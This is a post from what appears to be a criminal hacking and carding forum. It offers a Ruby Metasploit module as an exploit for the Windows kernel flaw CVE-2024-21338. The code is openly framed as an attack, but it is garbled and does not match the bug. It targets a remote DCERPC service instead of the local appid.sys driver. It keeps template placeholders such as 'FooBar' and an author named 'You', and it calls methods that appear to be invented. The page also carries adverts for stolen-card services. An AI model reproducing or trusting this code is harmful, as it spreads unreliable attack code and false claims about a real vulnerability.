Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338

Briansclub.cm Carding
Order your brand new Apple Vision from $3000 $900 only with us ! - Worldwide Delivery with escrow ! ☔
E1.Coders

E1.Coders

Beginner Hacker
in Escrow
0.0$
**This Metasploit module exploits a vulnerability in the Microsoft Windows Kernel Exposed IOCTL with an insufficient access control vulnerability.**
** (CVE-2024-21338). And after execution, it leads to the execution of access.**


What is this problem:

Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability
Microsoft Windows Kernel contains an exposed IOCTL with insufficient access control vulnerability within the IOCTL (input and output control) dispatcher in appid.sys that allows a local attacker to achieve privilege escalation.
Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known To Be Used in Ransomware Campaigns?: APT


**EXPLOIT :**

```

#############################################
# Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 #
#
# This module requires Metasploit: https://metasploit.com/download
#
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# #
#############################################


require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact

def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2024-21338 Exploit',
'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
'Author' => 'You',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-21338']
]
)
)

register_options(
[
OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
OptPort.new('RPORT', [true, 'The target port', 1234])
]
)
end

def check
connect

begin
impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
rescue Rex::post::Meterpreter::RequestError
return Exploit::CheckCode::Safe
end

Exploit::CheckCode::Appears
end

def exploit
connect

begin
impacket_artifact(
dcerpc_binding('ncacn_ip_tcp'),
'FooBar',
datastore['FooBarPayload']
)
rescue Rex::post::Meterpreter::RequestError
fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
end

handler
disconnect
end
end

```


#refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338

 
Last edited:
Legal warning We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use Leet Escrow on Telegram @leetlat

Richest Users with

Most in Escrow

PabloBusiness
PabloBusiness
96,840.0$ in Escrow
Alexander_Johnson
Alexander_Johnson
75,000.0$ in Escrow
LesterStash
LesterStash
72,366.9$ in Escrow
Vitalik_Dark
Vitalik_Dark
66,900.0$ in Escrow
CowBoy.exe
CowBoy.exe
60,000.0$ in Escrow
Back
Top